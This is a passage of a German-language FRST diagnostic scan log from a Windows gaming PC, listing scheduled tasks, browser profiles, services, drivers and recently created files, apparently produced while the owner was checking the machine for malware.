(Nvidia Corporation -> NVIDIA Corporation) Task: {906980F4-8A9F-4D28-A235-263827E4E846} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [906752 2022-05-20] (Nvidia Corporation -> NVIDIA Corporation) Task: {91AC97F0-4E7D-43EE-B738-817FF73D2F6D} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [1003128 2022-05-20] (Nvidia Corporation -> NVIDIA Corporation) -> -d "C:\Program Files\NVIDIA Corporation\NvDriverUpdateCheck" -l 3 -f C:\ProgramData\NVIDIA\NvContainerDriverUpdateCheck.log Task: {AB8BF43F-3023-49DD-97A4-9F29C36D1CE5} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [3342080 2022-05-20] (Nvidia Corporation -> NVIDIA Corporation) Task: {B3B430B3-2568-4730-AEEA-B1052DB2522F} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [906752 2022-05-20] (Nvidia Corporation -> NVIDIA Corporation) Task: {BA3ED9CB-81C6-414E-958A-B3E7AA529CA8} - System32\Tasks\NvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1654272 2022-05-20] (Nvidia Corporation -> NVIDIA Corporation) Task: {CC0A7A45-1E31-4823-951C-BE34A4B6753F} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2203.5-0\MpCmdRun.exe [993000 2022-04-08] (Microsoft Windows Publisher -> Microsoft Corporation) Task: {D1529CF3-305B-4714-AD86-332CDEB88597} - System32\Tasks\ASUS\Framework Service => C:\Program Files (x86)\ASUS\ArmouryDevice\asus_framework.exe [43022856 2022-01-11] (ASUSTeK COMPUTER INC. -> ASUSTek Computer Inc.) Task: {DB575289-EE17-4F83-A5D1-325A884A25F8} - System32\Tasks\NvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1654272 2022-05-20] (Nvidia Corporation -> NVIDIA Corporation) Task: {DC0B7859-04E0-4352-A99B-0907AB0EF465} - System32\Tasks\ASUS\ASUSUpdateTaskMachineUA => C:\Program Files (x86)\ASUS\Update\AsusUpdate.exe [158224 2022-04-08] (ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.) Task: {DD76535E-14DA-47AA-8E46-34A19F073241} - System32\Tasks\ASUS\ASUSUpdateTaskMachineCore1d84b6ef7c35684 => C:\Program Files (x86)\ASUS\Update\AsusUpdate.exe [158224 2022-04-08] (ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.) Task: {F29D09A4-7E44-42AD-AB09-5769D048AB80} - System32\Tasks\ASUS\P508PowerAgent_sdk => C:\Program Files (x86)\ASUS\ArmouryDevice\dll\ShareFromArmouryIII\Mouse\ROG STRIX CARRY\P508PowerAgent.exe (Keine Datei) (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.) ==================== Internet (Nicht auf der Ausnahmeliste) ==================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.) Tcpip\Parameters: [DhcpNameServer] 192.168.1.254 Tcpip\..\Interfaces\{89b7fff4-68ae-400c-b01c-cce359d50f18}: [DhcpNameServer] 192.168.1.254 Tcpip\..\Interfaces\{a99b7a34-7b15-42d4-b39d-6c218b5a2543}: [DhcpNameServer] 192.168.1.254 Edge: ======= Edge DefaultProfile: Profile 1 Edge Profile: C:\Users\Pauli\AppData\Local\Microsoft\Edge\User Data\Default [2022-06-19] Edge Profile: C:\Users\Pauli\AppData\Local\Microsoft\Edge\User Data\Profile 1 [2022-06-20] Edge HomePage: Profile 1 -> hxxp://www.google.de/ Edge StartupUrls: Profile 1 -> "hxxp://www.google.de/" Opera: ======= OPR Profile: C:\Users\Pauli\AppData\Roaming\Opera Software\Opera Stable [2022-06-20] OPR DefaultSuggestURL: Opera Stable -> hxxps://www.google.com/complete/search?client=opera&q={searchTerms}&ie={inputEncoding}&oe={outputEncoding} OPR Extension: (Rich Hints Agent) - C:\Users\Pauli\AppData\Roaming\Opera Software\Opera Stable\Extensions\enegjkbbakeegngfapepobipndnebkdk [2022-05-13] OPR Extension: (Opera Crypto Wallet) - C:\Users\Pauli\AppData\Roaming\Opera Software\Opera Stable\Extensions\gojhcdgcpbpfigcaejpfhfegekdgiblk [2022-05-13] OPR Extension: (Amazon Assistant Promotion) - C:\Users\Pauli\AppData\Roaming\Opera Software\Opera Stable\Extensions\kbmoiomgmchbpihhdpabemajcbjpcijk [2022-05-13] ==================== Dienste (Nicht auf der Ausnahmeliste) =================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) R2 ArmouryCrateService; C:\Program Files\ASUS\ARMOURY CRATE Lite Service\ArmouryCrate.Service.exe [372456 2022-05-13] (ASUSTeK COMPUTER INC. -> ASUSTeK COMPUTER INC.) S3 ArmouryLiveUpdate; C:\Windows\System32\DriverStore\FileRepository\rogms.inf_amd64_1d3b9add1418e6f7\ArmouryLiveUpdate.exe [577280 2022-05-17] (ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.) R2 asComSvc; C:\Program Files (x86)\ASUS\AXSP\4.02.12\atkexComSvc.exe [457544 2022-02-10] (ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.) S2 asus; C:\Program Files (x86)\ASUS\Update\AsusUpdate.exe [158224 2022-04-08] (ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.) R2 AsusCertService; C:\Program Files (x86)\ASUS\AsusCertService\AsusCertService.exe [181576 2022-03-09] (ASUSTeK Computer Inc. -> ASUSTek COMPUTER INC.) R2 AsusFanControlService; C:\Program Files (x86)\ASUS\AsusFanControlService\2.01.13\AsusFanControlService.exe [2216264 2022-03-09] (ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.) S3 asusm; C:\Program Files (x86)\ASUS\Update\AsusUpdate.exe [158224 2022-04-08] (ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.) R2 AsusUpdateCheck; C:\Windows\System32\AsusUpdateCheck.exe [1164992 2022-06-20] (ASUSTeK Computer Inc. -> ) S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [8885112 2022-05-17] (BattlEye Innovations e.K. -> ) R2 CC-Updater; C:\Windows\cc\WinCtlSvc.exe [7518088 2022-05-24] (Salfeld Computer GmbH -> Salfeld Computer) R2 CorsairGamingAudioConfig; C:\Windows\System32\CorsairGamingAudioCfgService64.exe [661016 2022-03-01] (Microsoft Windows Hardware Compatibility Publisher -> Corsair Memory, Inc.) R2 CorsairLLAService; C:\Program Files\Corsair\CORSAIR iCUE 4 Software\CueLLAccessService.exe [230504 2022-03-17] (Corsair Memory, Inc. -> Corsair Memory, Inc.) R2 CorsairService; C:\Program Files\Corsair\CORSAIR iCUE 4 Software\Corsair.Service.exe [81512 2022-03-17] (Corsair Memory, Inc. -> Corsair Memory, Inc.) R2 DtsApo4Service; C:\Windows\System32\DTS\PC\APO4x\DtsApo4Service.exe [224680 2021-09-22] (DTS, Inc. -> DTS Inc.) R2 EABackgroundService; C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EABackgroundService.exe [10932944 2022-06-14] (Electronic Arts, Inc. -> Electronic Arts) S3 EasyAntiCheat; C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe [1135648 2022-05-16] (EasyAntiCheat Oy -> Epic Games, Inc) S3 EasyAntiCheat_EOS; C:\Program Files (x86)\EasyAntiCheat_EOS\EasyAntiCheat_EOS.exe [584680 2022-05-01] (EasyAntiCheat Oy -> Epic Games, Inc.) S3 EpicOnlineServices; C:\Program Files (x86)\Epic Games\Epic Online Services\service\EpicOnlineServicesHost.exe [934368 2022-03-03] (Epic Games Inc. -> Epic Games, Inc.) S2 GameInput Service; C:\Program Files (x86)\Microsoft GameInput\x64\gameinputsvc.exe [75240 2022-05-25] (Microsoft Corporation -> Microsoft Corporation) R2 GameSDK Service; C:\Program Files (x86)\ASUS\GameSDK Service\GameSDK.exe [397544 2022-05-31] (ASUSTeK COMPUTER INC. -> ASUS Inc.) R3 iCUEDevicePluginHost; C:\Program Files\Corsair\CORSAIR iCUE 4 Software\iCUEDevicePluginHost.exe [440936 2022-03-17] (Corsair Memory, Inc. -> Corsair) R2 LGHUBUpdaterService; C:\Program Files\LGHUB\lghub_updater.exe [11523704 2022-06-11] (Logitech Inc -> Logitech, Inc.) R2 LightingService; C:\Program Files (x86)\LightingService\LightingService.exe [3835360 2022-03-10] (ASUSTeK COMPUTER INC. -> ASUSTek Computer Inc.) S3 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [2575624 2022-05-27] (Electronic Arts, Inc. -> Electronic Arts) R2 Origin Web Helper Service; C:\Program Files (x86)\Origin\OriginWebHelperService.exe [3494672 2022-05-27] (Electronic Arts, Inc. -> Electronic Arts) S3 Rockstar Service; C:\Program Files\Rockstar Games\Launcher\RockstarService.exe [1908688 2022-06-16] (Rockstar Games, Inc. -> Rockstar Games) R2 ROG Live Service; C:\Program Files (x86)\ASUS\ROG Live Service\ROGLiveService.exe [6304488 2022-04-25] (ASUSTeK COMPUTER INC. -> ASUSTek COMPUTER INC.) R2 SCC-Dienst; C:\Windows\cc\ctlsysmgr.exe [7835528 2022-05-24] (Salfeld Computer GmbH -> Salfeld Computer) S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [6207704 2022-06-17] (Microsoft Windows Publisher -> Microsoft Corporation) S3 ucldr_Crowz_ST; C:\Program Files\Common Files\Wellbia.com\ucldr_Crowz_ST.exe [5534960 2022-06-05] (Wellbia.com Co., Ltd. -> Wellbia.com Co., Ltd.) S2 upccsvc; C:\Windows\upcc\upccsvc.exe [1683616 2019-02-06] (Salfeld Computer GmbH -> Salfeld GmbH) R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2203.5-0\NisSrv.exe [3116848 2022-04-08] (Microsoft Windows Publisher -> Microsoft Corporation) R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2203.5-0\MsMpEng.exe [133544 2022-04-08] (Microsoft Windows Publisher -> Microsoft Corporation) R2 WMIRegistrationService; C:\Windows\System32\DriverStore\FileRepository\mewmiprov.inf_amd64_cad1db73e8c782a6\WMIRegistrationService.exe [538736 2021-11-30] (Intel Corporation -> Intel Corporation) R2 NVDisplay.ContainerLocalSystem; C:\Windows\System32\DriverStore\FileRepository\nv_dispig.inf_amd64_647b4244e991951b\Display.NvContainer\NVDisplay.Container.exe -s NVDisplay.ContainerLocalSystem -f %ProgramData%\NVIDIA\NVDisplay.ContainerLocalSystem.log -l 3 -d C:\Windows\System32\DriverStore\FileRepository\nv_dispig.inf_amd64_647b4244e991951b\Display.NvContainer\plugins\LocalSystem -r -p 30000 -cfg NVDisplay.ContainerLocalSystem\LocalSystem ===================== Treiber (Nicht auf der Ausnahmeliste) =================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) S3 AcxHdAudio; C:\Windows\System32\drivers\AcxHdAudio.sys [557056 2022-06-17] (Microsoft Windows -> Microsoft Corporation) S3 AppleLowerFilter; C:\Windows\System32\drivers\AppleLowerFilter.sys [35976 2020-10-09] (WDKTestCert build,132303256403278908 -> Apple Inc.) R1 Asusgio2; C:\Windows\system32\drivers\AsIO2.sys [34384 2022-02-10] (ASUSTeK Computer Inc. -> ) R1 Asusgio3; C:\Windows\system32\drivers\AsIO3.sys [43168 2022-03-09] (ASUSTeK Computer Inc. -> ) S3 BthA2dp; C:\Windows\System32\drivers\BthA2dp.sys [507904 2021-11-04] (Microsoft Corporation) [Datei ist nicht signiert] S3 BthHFEnum; C:\Windows\System32\drivers\bthhfenum.sys [180224 2021-11-04] (Microsoft Corporation) [Datei ist nicht signiert] S3 BTHMODEM; C:\Windows\System32\drivers\bthmodem.sys [98304 2021-06-05] (Microsoft Corporation) [Datei ist nicht signiert] S3 CorsairGamingAudioService; C:\Windows\System32\drivers\CorsairGamingAudio64.sys [61976 2022-03-01] (Microsoft Windows Hardware Compatibility Publisher -> Corsair Memory, Inc.) R2 CorsairLLAccessC2D033F14715AA7325305EA42FBFC65BF867CC1D; C:\Program Files\Corsair\CORSAIR iCUE 4 Software\CorsairLLAccess64.sys [21752 2022-01-31] (Microsoft Windows Hardware Compatibility Publisher -> Corsair Memory, Inc.) R3 CorsairVBusDriver; C:\Windows\System32\drivers\CorsairVBusDriver.sys [46600 2022-01-31] (Microsoft Windows Hardware Compatibility Publisher -> Corsair) R3 CorsairVHidDriver; C:\Windows\System32\drivers\CorsairVHidDriver.sys [22536 2022-01-31] (Microsoft Windows Hardware Compatibility Publisher -> Corsair) R3 cpuz153; C:\Windows\temp\cpuz153\cpuz153_x64.sys [36864 2022-06-20] (Microsoft Windows Hardware Compatibility Publisher -> CPUID) R1 CTIAIO; C:\Windows\system32\drivers\CtiAIo64.sys [32304 2022-06-20] (Microsoft Windows Hardware Compatibility Publisher -> Creative Technology Innovation Co., LTd.) S3 e2f68; C:\Windows\System32\drivers\e2f68.sys [485376 2021-06-01] (Microsoft Windows -> Intel Corporation) S3 Hsp; C:\Windows\System32\drivers\Hsp.sys [111960 2022-05-13] (Microsoft Windows -> Microsoft Corporation) R3 iaLPSS2_GPIO2_ADL; C:\Windows\System32\DriverStore\FileRepository\ialpss2_gpio2_adl.inf_amd64_e11257f05c0c2f89\iaLPSS2_GPIO2_ADL.sys [139928 2021-07-29] (Intel Corporation -> Intel Corporation) R3 iaLPSS2_I2C_ADL; C:\Windows\System32\DriverStore\FileRepository\ialpss2_i2c_adl.inf_amd64_778b19a5f4d49cba\iaLPSS2_I2C_ADL.sys [202896 2021-07-29] (Intel Corporation -> Intel Corporation) R0 iaStorVD; C:\Windows\System32\drivers\iaStorVD.sys [1587376 2021-10-19] (Intel Corporation -> Intel Corporation) R4 IOMap; C:\Windows\system32\drivers\IOMap64.sys [46728 2022-03-21] (ASUSTEK COMPUTER INC. -> ASUSTeK Computer Inc.) S3 logi_generic_hid_filter; C:\Windows\system32\drivers\logi_generic_hid_filter.sys [55624 2022-05-13] (Logitech Inc -> Logitech) R3 logi_joy_bus_enum; C:\Windows\system32\drivers\logi_joy_bus_enum.sys [33528 2022-04-29] (WDKTestCert builder,132743893872553407 -> Logitech) S3 logi_joy_hid_filter; C:\Windows\system32\drivers\logi_joy_hid_filter.sys [56656 2022-05-13] (Logitech Inc -> Logitech) S3 logi_joy_hid_lo; C:\Windows\system32\drivers\logi_joy_hid_lo.sys [41280 2022-04-29] (WDKTestCert builder,132743893872553407 -> Logitech) S3 logi_joy_vir_hid; C:\Windows\system32\drivers\logi_joy_vir_hid.sys [21704 2022-04-29] (WDKTestCert builder,132743893872553407 -> Logitech) R3 logi_joy_xlcore; C:\Windows\system32\drivers\logi_joy_xlcore.sys [62904 2022-04-29] (WDKTestCert builder,132743893872553407 -> Logitech) R1 MSIO; C:\Windows\system32\drivers\MsIo64.sys [17424 2020-01-19] (Microsoft Windows Hardware Compatibility Publisher -> MICSYS Technology Co., LTd) R1 netfltcc; C:\Windows\System32\drivers\netfltcc.sys [95752 2019-08-21] (Microsoft Windows Hardware Compatibility Publisher -> Windows (R) Win 7 DDK provider) R3 nvvad_WaveExtensible; C:\Windows\system32\drivers\nvvad64v.sys [48552 2021-11-01] (Microsoft Windows Hardware Compatibility Publisher -> NVIDIA Corporation) R3 ROGKB; C:\Windows\System32\DriverStore\FileRepository\rogkb.inf_amd64_7b02b00ea166ec76\ROGKB.sys [38056 2022-05-17] (ASUSTeK COMPUTER INC. -> Windows (R) Win 7 DDK provider) R3 ROGMS; C:\Windows\System32\DriverStore\FileRepository\rogms.inf_amd64_1d3b9add1418e6f7\ROGMS.sys [37544 2022-05-17] (ASUSTeK COMPUTER INC. -> Windows (R) Win 7 DDK provider) S0 WdBoot; C:\Windows\System32\drivers\wd\WdBoot.sys [49600 2022-04-08] (Microsoft Windows Early Launch Anti-Malware Publisher -> Microsoft Corporation) R0 WdFilter; C:\Windows\System32\drivers\wd\WdFilter.sys [443664 2022-04-08] (Microsoft Windows -> Microsoft Corporation) R3 WdNisDrv; C:\Windows\System32\drivers\wd\WdNisDrv.sys [90384 2022-04-08] (Microsoft Windows -> Microsoft Corporation) S3 xhunter1; C:\Windows\xhunter1.sys [1431256 2022-06-05] (Wellbia.com Co., Ltd. -> Wellbia.com Co., Ltd.) ==================== NetSvcs (Nicht auf der Ausnahmeliste) =================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) ==================== Ein Monat (erstellte) (Nicht auf der Ausnahmeliste) ========= (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.) 2022-06-20 17:29 - 2022-06-20 17:29 - 000000008 __RSH C:\ProgramData\ntuser.pol 2022-06-20 17:28 - 2022-06-20 17:28 - 000040163 _____ C:\Users\Pauli\Desktop\Fixlog.txt 2022-06-20 17:26 - 2022-06-20 17:26 - 000000000 _____ C:\Users\Pauli\Desktop\Textdokument (neu) (2).txt 2022-06-20 17:11 - 2022-06-20 17:11 - 000000000 ____D C:\Users\Pauli\AppData\Local\ArmouryLiveUpdate 2022-06-20 10:58 - 2022-06-20 10:58 - 000001466 _____ C:\Users\Pauli\Desktop\AdwCleaner[S01].txt 2022-06-20 10:57 - 2022-06-20 10:57 - 000001422 _____ C:\Users\Pauli\Desktop\malwarebytes_scanbericht.txt 2022-06-20 10:51 - 2022-06-20 10:51 - 002549096 _____ (Malwarebytes) C:\Users\Pauli\Downloads\MBSetup.exe 2022-06-20 10:07 - 2022-06-20 10:11 - 000002030 _____ C:\Users\Pauli\Desktop\Textdokument (neu).txt 2022-06-20 09:45 - 2022-06-20 09:45 - 000000000 ___HD C:\$WinREAgent 2022-06-20 09:41 - 2022-06-20 17:31 - 000030855 _____ C:\Users\Pauli\Desktop\FRST.txt 2022-06-20 09:41 - 2022-06-20 09:42 - 000070650 _____ C:\Users\Pauli\Desktop\Addition.txt 2022-06-20 09:40 - 2022-06-20 17:30 - 000000000 ____D C:\FRST 2022-06-20 09:39 - 2022-06-20 09:40 - 002369024 _____ (Farbar) C:\Users\Pauli\Desktop\FRST64.exe 2022-06-19 21:42 - 2022-06-19 21:42 - 000001164 _____ C:\Users\Pauli\Desktop\Microsoft Flight Simulator.lnk 2022-06-18 21:34 - 2022-06-18 21:34 - 000000000 ____D C:\Users\Pauli\AppData\Roaming\HelloGames 2022-06-18 18:36 - 2022-06-18 18:36 - 000000223 _____ C:\Users\Pauli\Desktop\Days Gone.url 2022-06-17 14:01 - 2022-06-17 14:01 - 000614400 _____ C:\Windows\system32\TextInputMethodFormatter.dll 2022-06-17 14:01 - 2022-06-17 14:01 - 000557056 _____ (Microsoft Corporation) C:\Windows\system32\PhotoScreensaver.scr 2022-06-17 14:01 - 2022-06-17 14:01 - 000524288 _____ C:\Windows\system32\AssignedAccessCsp.dll 2022-06-17 14:01 - 2022-06-17 14:01 - 000485376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PhotoScreensaver.scr 2022-06-17 14:01 - 2022-06-17 14:01 - 000335872 _____ C:\Windows\system32\Windows.Management.InprocObjects.dll 2022-06-17 14:01 - 2022-06-17 14:01 - 000299008 _____ C:\Windows\system32\EsclScan.dll 2022-06-17 14:01 - 2022-06-17 14:01 - 000180224 _____ C:\Windows\system32\EsclProtocol.dll 2022-06-17 14:01 - 2022-06-17 14:01 - 000167936 _____ C:\Windows\system32\DeviceUpdateCenterCsp.dll 2022-06-17 14:01 - 2022-06-17 14:01 - 000057344 _____ C:\Windows\system32\uwfservicingapi.dll 2022-06-17 14:01 - 2022-06-17 14:01 - 000015042 _____ C:\Windows\system32\DrtmAuthTxt.wim 2022-06-16 10:33 - 2022-06-16 10:33 - 000000000 ____D C:\Users\Pauli\AppData\LocalLow\Landfall 2022-06-13 16:25 - 2022-06-14 14:01 - 000000000 ____D C:\Users\Pauli\AppData\Local\Fallout4 MS 2022-06-12 18:11 - 2022-06-12 18:11 - 000001911 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Setup.lnk 2022-06-12 18:11 - 2022-06-12 18:11 - 000000000 ____D C:\Windows\ShellServiceLog 2022-06-12 14:41 - 2022-06-12 14:41 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Logi 2022-06-12 14:41 - 2022-06-12 14:41 - 000000000 ____D C:\Program Files\LGHUB 2022-06-11 20:24 - 2022-06-11 20:24 - 000000000 ____D C:\Users\Pauli\AppData\Local\ReadyOrNot 2022-06-11 20:11 - 2022-06-11 20:11 - 000000223 _____ C:\Users\Pauli\Desktop\Ready or Not.url 2022-06-10 12:57 - 2022-06-10 12:57 - 000000000 ____D C:\Users\Pauli\AppData\Roaming\IO Interactive 2022-06-09 19:35 - 2022-06-09 19:35 - 000000000 ____D C:\Program Files (x86)\Windows Kits 2022-06-09 19:35 - 2022-06-09 19:35 - 000000000 ____D C:\Program Files (x86)\Microsoft GameInput 2022-06-06 20:49 - 2022-06-06 20:49 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Kindersicherung 2022-06-06 20:09 - 2022-06-06 20:10 - 000000000 ____D C:\ProgramData\HitmanPro 2022-06-06 20:09 - 2022-06-06 20:09 - 000000000 ____D C:\Program Files\HitmanPro 2022-06-06 19:58 - 2022-06-10 18:08 - 000001244 _____ C:\Users\Pauli\Desktop\Roblox Studio.lnk 2022-06-06 18:10 - 2022-06-06 18:10 - 000000000 ____D C:\Users\Pauli\AppData\Local\IO Interactive 2022-06-06 15:24 - 2022-06-06 15:24 - 000000000 ____D C:\Users\Pauli\AppData\Roaming\EasyAntiCheat 2022-06-05 16:47 - 2022-06-10 18:08 - 000001421 _____ C:\Users\Pauli\Desktop\Roblox Player.lnk 2022-06-05 16:47 - 2022-06-10 18:08 - 000000000 ____D C:\Users\Pauli\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Roblox 2022-06-05 16:47 - 2022-06-05 22:19 - 000000000 ____D C:\Users\Pauli\AppData\Local\Roblox 2022-06-05 16:47 - 2022-06-05 22:16 - 000000256 _____ C:\Users\Pauli\AppData\LocalLow\rbxcsettings.rbx 2022-06-05 15:22 - 2022-06-05 15:22 - 000000000 ____D C:\Program Files\Common Files\Wellbia.com 2022-06-04 15:54 - 2022-06-04 22:32 - 000000000 ____D C:\Users\Pauli\AppData\Roaming\discord 2022-06-04 15:54 - 2022-06-04 22:19 - 000000000 ____D C:\Users\Pauli\AppData\Local\Discord 2022-06-04 15:54 - 2022-06-04 15:54 - 000002227 _____ C:\Users\Pauli\Desktop\Discord.lnk 2022-06-04 15:54 - 2022-06-04 15:54 - 000000000 ____D C:\Users\Pauli\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Discord Inc 2022-06-04 15:49 - 2022-06-04 15:50 - 000000000 ____D C:\_backup 2022-06-02 19:32 - 2022-06-02 19:33 - 000000000 ____D C:\ProgramData\EA Logs 2022-06-02 19:32 - 2022-06-02 19:32 - 000000000 ____D C:\ProgramData\PopCap Games 2022-06-02 19:32 - 2022-06-02 19:32 - 000000000 ____D C:\ProgramData\EA Core 2022-05-31 19:52 - 2022-05-31 19:52 - 000000000 ____D C:\Users\Pauli\AppData\LocalLow\Curve Digital 2022-05-31 19:31 - 2022-06-08 17:39 - 000000000 ____D C:\Users\Pauli\AppData\Local\Ubisoft Game Launcher 2022-05-31 19:31 - 2022-05-31 19:31 - 000001323 _____ C:\Users\Pauli\Desktop\Ubisoft Connect.lnk 2022-05-31 19:31 - 2022-05-31 19:31 - 000000000 ____D C:\Users\Pauli\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Ubisoft 2022-05-31 19:31 - 2022-05-31 19:31 - 000000000 ____D C:\ProgramData\Ubisoft 2022-05-31 19:30 - 2022-05-31 19:30 - 000000000 ____D C:\Program Files (x86)\Ubisoft 2022-05-31 19:15 - 2022-06-06 20:44 - 000000085 _____ C:\Windows\wininit.ini 2022-05-31 18:35 - 2022-05-31 18:35 - 000000000 ____D C:\Windows\system32\Tasks\Safer-Networking 2022-05-31 18:34 - 2022-06-06 20:48 - 000000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2 2022-05-31 18:34 - 2022-06-06 20:44 - 000000000 ____D C:\ProgramData\Spybot - Search & Destroy 2022-05-31 18:34 - 2022-05-31 18:34 - 000000000 ____D C:\Users\Pauli\AppData\Local\BraveSoftware 2022-05-31 18:34 - 2022-05-31 18:34 - 000000000 ____D C:\Program Files (x86)\BraveSoftware 2022-05-31 18:22 - 2022-05-31 18:22 - 000000000 ____D C:\Users\Pauli\AppData\Local\mbam 2022-05-30 19:25 - 2022-06-19 21:32 - 000000000 ____D C:\Users\Pauli\AppData\LocalLow\Ninja Kiwi 2022-05-30 17:00 - 2022-05-30 17:00 - 000000000 ____D C:\Users\Pauli\AppData\Local\GSS2 2022-05-29 17:51 - 2022-05-29 17:52 - 000000000 ____D C:\Users\Pauli\AppData\Local\Sniper Elite 5 2022-05-29 16:59 - 2022-05-21 05:26 - 001905912 _____ C:\Windows\system32\vulkaninfo-1-999-0-0-0.exe 2022-05-29 16:59 - 2022-05-21 05:26 - 001905912 _____ C:\Windows\system32\vulkaninfo.exe 2022-05-29 16:59 - 2022-05-21 05:26 - 001478384 _____ C:\Windows\SysWOW64\vulkaninfo-1-999-0-0-0.exe 2022-05-29 16:59 - 2022-05-21 05:26 - 001478384 _____ C:\Windows\SysWOW64\vulkaninfo.exe 2022-05-29 16:59 - 2022-05-21 05:26 - 001467080 _____ (Khronos Group) C:\Windows\system32\OpenCL.dll 2022-05-29 16:59 - 2022-05-21 05:26 - 001432304 _____ C:\Windows\system32\vulkan-1-999-0-0-0.dll 2022-05-29 16:59 - 2022-05-21 05:26 - 001432304 _____ C:\Windows\system32\vulkan-1.dll 2022-05-29 16:59 - 2022-05-21 05:26 - 001209408 _____ (Khronos Group) C:\Windows\SysWOW64\OpenCL.dll 2022-05-29 16:59 - 2022-05-21 05:26 - 001145584 _____ C:\Windows\SysWOW64\vulkan-1-999-0-0-0.dll 2022-05-29 16:59 - 2022-05-21 05:26 - 001145584 _____ C:\Windows\SysWOW64\vulkan-1.dll 2022-05-29 16:59 - 2022-05-21 05:23 - 000587336 _____ C:\Windows\system32\nvofapi64.dll 2022-05-29 16:59 - 2022-05-21 05:23 - 000460496 _____ C:\Windows\SysWOW64\nvofapi.dll 2022-05-29 16:59 - 2022-05-21 05:22 - 002120896 _____ (NVIDIA Corporation) C:\Windows\system32\NvFBC64.dll 2022-05-29 16:59 - 2022-05-21 05:22 - 001603144 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvFBC.dll 2022-05-29 16:59 - 2022-05-21 05:22 - 001530456 _____ (NVIDIA Corporation) C:\Windows\system32\NvIFR64.dll 2022-05-29 16:59 - 2022-05-21 05:22 - 001177312 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvIFR.dll 2022-05-29 16:59 - 2022-05-21 05:22 - 000730320 _____ (NVIDIA Corporation) C:\Windows\system32\nvEncodeAPI64.dll 2022-05-29 16:59 - 2022-05-21 05:22 - 000712416 _____ (NVIDIA Corporation) C:\Windows\system32\nvidia-smi.exe 2022-05-29 16:59 - 2022-05-21 05:21 - 006964824 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuvid.dll 2022-05-29 16:59 - 2022-05-21 05:21 - 006226640 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuvid.dll 2022-05-29 16:59 - 2022-05-21 05:21 - 005100752 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuda.dll 2022-05-29 16:59 - 2022-05-21 05:21 - 002932952 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuda.dll 2022-05-29 16:59 - 2022-05-21 05:21 - 000582712 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvEncodeAPI.dll 2022-05-29 16:59 - 2022-05-21 05:21 - 000457944 _____ (NVIDIA Corporation) C:\Windows\system32\nvdebugdump.exe 2022-05-29 16:59 - 2022-05-21 05:20 - 005730880 _____ (NVIDIA Corporation) C:\Windows\system32\nvcpl.dll 2022-05-29 16:59 - 2022-05-21 05:19 - 000851136 _____ (NVIDIA Corporation) C:\Windows\system32\MCU.exe 2022-05-29 16:59 - 2022-05-20 02:51 - 000089337 _____ C:\Windows\system32\nvinfo.pb 2022-05-27 15:04 - 2022-05-27 15:04 - 000000000 ____D C:\Users\Pauli\AppData\Local\MW5Mercs 2022-05-24 18:11 - 2022-05-24 18:11 - 000000222 _____ C:\Users\Pauli\Desktop\Cat Goes Fishing.url 2022-05-24 18:11 - 2022-05-24 18:11 - 000000000 ____D C:\Users\Pauli\AppData\Local\Cat_Goes_Fishing 